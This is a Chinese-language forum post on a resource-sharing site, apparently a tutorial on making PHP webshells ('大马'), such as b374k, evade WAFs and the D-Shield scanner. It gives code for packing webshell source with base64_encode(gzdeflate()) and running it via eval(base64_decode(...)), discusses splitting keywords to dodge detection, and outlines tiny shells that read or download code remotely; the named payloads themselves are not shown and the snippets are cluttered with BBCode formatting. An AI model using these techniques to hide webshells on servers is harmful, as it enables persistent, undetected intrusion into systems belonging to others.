小佳娱乐网_最专业的资源收集分享平台 有图有质量的资源教程源码分享,小刀娱乐网,爱Q生活网,小K娱乐网,免费QQ资源,小佳资源网,

 找回密码
 立即注册账号

QQ登录

只需一步,快速开始

PHP免杀大马的奇淫技巧

发布者: xiaojia | 发布时间: 2019-4-22 22:24| 查看数: 2022| 评论数: 0|帖子模式

本文最后更新于 [url=]2018年11月17日 22:48[/url] 可能会因为没有更新而失效。如已失效或需要修正,请留言!

Part 1
常见PHP大马:
Part 2
大马后门检查: Fiddler 抓包
审计代码
这里我以http://webshell8.com/ 这里的大马为例子演示
修改并运行脚本
Burp抓包或者右键查看原代码
修改并运行代码
再使用Burp抓个包
查找关键字GetHtml hmlogin localhost等
把上图的base64代码解密下
Part 3
大马源码免杀
这里我使用的是国外的一款大马b374k来进行免杀。
执行代码 eval 或 preg_replace的/e修饰符来执行大马代码。

[backcolor=rgb(248, 248, 255) !important]
[color=rgb(170, 170, 170) !important]1

[color=rgb(170, 170, 170) !important]2

[color=rgb(170, 170, 170) !important]3


[color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]a[color=rgb(0, 111, 224) !important] [color=rgb(0, 111, 224) !important]=[color=rgb(0, 111, 224) !important] [color=rgb(221, 17, 68) !important]'phpinfo();'[color=rgb(51, 51, 51) !important];
[color=teal !important]eval[color=rgb(51, 51, 51) !important]([color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]a[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important];
[color=rgb(153, 153, 153) !important]//eval执行php代码




编码
如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

[backcolor=rgb(248, 248, 255) !important]
[color=rgb(170, 170, 170) !important]1

[color=rgb(170, 170, 170) !important]2

[color=rgb(170, 170, 170) !important]3


[color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]code[color=rgb(0, 111, 224) !important]=[color=rgb(0, 111, 224) !important] [color=teal !important]file_get_contents[color=rgb(51, 51, 51) !important]([color=rgb(221, 17, 68) !important]'D:\phpStudy\WWW\Test\Zlib\help.txt'[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important];[color=rgb(0, 111, 224) !important] [color=rgb(153, 153, 153) !important]//大马源码路径
[color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]encode[color=rgb(0, 111, 224) !important] [color=rgb(0, 111, 224) !important]=[color=rgb(0, 111, 224) !important] [color=teal !important]base64_encode[color=rgb(51, 51, 51) !important]([color=teal !important]gzdeflate[color=rgb(51, 51, 51) !important]([color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]code[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important];[color=rgb(0, 111, 224) !important] [color=rgb(153, 153, 153) !important]//加密函数自己修改就行
echo[color=rgb(0, 111, 224) !important] [color=rgb(51, 51, 51) !important]$[color=rgb(0, 45, 122) !important]encode[color=rgb(51, 51, 51) !important];[color=rgb(0, 111, 224) !important] [color=rgb(153, 153, 153) !important]//输出加密后代码




在线加解密码 点这里
这里我先将b374k的源码去掉<?php ?>后,base64加密
解码
通过解码执行我们的代码。
那我们来试试解码并执行刚刚base64加密的大马。

[backcolor=rgb(248, 248, 255) !important]
[color=rgb(170, 170, 170) !important]1

[color=rgb(170, 170, 170) !important]2

[color=rgb(170, 170, 170) !important]3


[color=rgb(255, 0, 0) !important]<?php
[color=teal !important]eval[color=rgb(51, 51, 51) !important](
[color=teal !important]base64_decode[color=rgb(51, 51, 51) !important]([color=rgb(221, 17, 68) !important]'刚刚加密的代码'[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important];
[color=rgb(255, 0, 0) !important]?>




关键字免杀

[backcolor=rgb(248, 248, 255) !important]
[color=rgb(170, 170, 170) !important]1

[color=rgb(170, 170, 170) !important]2

[color=rgb(170, 170, 170) !important]3


[color=rgb(153, 153, 153) !important]// 类型这样的关键字如果没有混淆拆分是过不了waf的
[color=teal !important]eval[color=rgb(51, 51, 51) !important](
[color=teal !important]base64_decode[color=rgb(51, 51, 51) !important]([color=rgb(221, 17, 68) !important]'code'[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important])[color=rgb(51, 51, 51) !important];
[color=rgb(153, 153, 153) !important]// 我们需要做的就是关键字免杀




免杀 payload 1 过狗过D盾 注意: code就是我们刚刚加密的base64代码。
免杀
D盾规则库
免杀 payload 2
总结,源码免杀就到这里了,其实只需要些php基础,轻松免杀。
Part 4
只有几百字节的大马
首先我们需要了解,几百字节是什么概念 1kb = 1024b
那么我们怎么实现呢,2种思路远程读取和远程下载
远程读取 payload 3
上传txt
免杀
payload 4
免杀
远程下载 payload 5
免杀
大小最小的一百多字节,其他2个两百多字节那样子。

最新评论

广告位招租 X

站长QQ353535611

这是一条广告位,建议不超过105个字节。以免影响美观,广告位广告位广告位广告位广广告位广告位告位广告位...

参加活动查看新闻详情

QQ|小佳娱乐网  鄂公网安备16003862号-1

GMT+8, 2019-11-20 20:19 , Processed in 0.105014 second(s), 44 queries .

Powered by Discuz! X3.2

© 2001-2017 Comsenz Inc. Template By 【未来科技】【 www.wekei.cn 】

快速回复 返回顶部 返回列表